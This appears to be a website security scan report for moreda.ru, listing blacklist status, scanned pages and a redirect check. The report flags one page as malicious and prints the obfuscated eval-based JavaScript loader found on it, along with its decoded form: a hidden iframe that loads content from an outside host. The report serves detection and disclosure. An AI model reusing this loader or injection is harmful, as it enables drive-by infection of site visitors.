Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=moreda.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://moreda.ru/ | HTTP/1.1 200 OK Cache-Control: max-age=0 Connection: close Date: Mon, 12 Jan 2015 02:05:31 GMT Accept-Ranges: bytes ETag: "115743e-3487-44577db35bf00" Server: Apache Vary: Accept-Encoding Content-Length: 13447 Content-Type: text/html; charset=windows-1251 Expires: Mon, 12 Jan 2015 02:05:31 GMT Last-Modified: Wed, 06 Feb 2008 06:56:28 GMT | clean |
http://moreda.ru/es/zonapublica/index.aspx.htm | 200 OK Content-Length: 16838 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pnwban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,42,16,58,3,6,24,37,19,15,0,0,0,0,0,0,20,27,30,31,56,5,28,33,47,25,52,61,40,14,29,2,51,35,46,55,11,1,32,34,8,22,45,0,0,0,0,43,0,21,44,7,18,9,48,0,12,36,53,50,39,10,49,13,4,23,38,26,54,59,41,60,62,17,57);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(184^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}pnwban('9cZjFCKPYRhPIPFPTqDlwCZjN0zVFCKtoqNSYPb79_FJhSoiCd6JB_FtaSorYlNjNqXQMtXSNQzkmHNGsOoPhQbVqBzP90b7TWFJCHb7yAZSqCePqBDl8YCth4Z7mCNPYPoijloP2AvkIAoSqqoiymzWT5XVg5ziCkLQokNSCMzlsWzPyPoP2qLWURXr2SNJC4oPEr6WMWzkhchjNqLrFcKkX8NtUTLjqANSssXGq5ZSmlNjNADlyO') Decoded script: window.status='Done';document.write('<iframe name=465de src="http://www.3pigs.info/t/?'+Math.round(Math.random()*33988)+'465de'+'" width=293 height=116 style="display:none"></iframe>') window.status='Done';document.write('<iframe name=465de src="http://www.3pigs.info/t/?'+Math.round(Math.random()*33988)+'465de'+'" width=293 height=116 style="display:none"></iframe>') <iframe name=465de src="http://www.3pigs.info/t/?11506465de" width=293 height=116 style="display:none"></iframe> Antivirus reports:
| ||
http://moreda.ru/es/zonapublica/../../js/ventana.js | 200 OK Content-Length: 830 Content-Type: application/javascript | clean |
http://moreda.ru/../../js/cookies.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://moreda.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://moreda.ru/../../js/utils.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://moreda.ru/../../js/validar.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://moreda.ru/../../js/optimized/animtree.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://moreda.ru/../../js/optimized/persistenttree.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: moreda.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Mon, 12 Jan 2015 02:05:31 GMT
Accept-Ranges: bytes
ETag: "115743e-3487-44577db35bf00"
Server: Apache
Vary: Accept-Encoding
Content-Length: 13447
Content-Type: text/html; charset=windows-1251
Expires: Mon, 12 Jan 2015 02:05:31 GMT
Last-Modified: Wed, 06 Feb 2008 06:56:28 GMT
...13447 bytes of data.
GET / HTTP/1.1
Host: moreda.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Mon, 12 Jan 2015 02:05:31 GMT
Accept-Ranges: bytes
ETag: "115743e-3487-44577db35bf00"
Server: Apache
Vary: Accept-Encoding
Content-Length: 13447
Content-Type: text/html; charset=windows-1251
Expires: Mon, 12 Jan 2015 02:05:31 GMT
Last-Modified: Wed, 06 Feb 2008 06:56:28 GMT
...13447 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: moreda.ru
Referer: http://www.google.com/search?q=moreda.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: moreda.ru
Referer: http://www.google.com/search?q=moreda.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.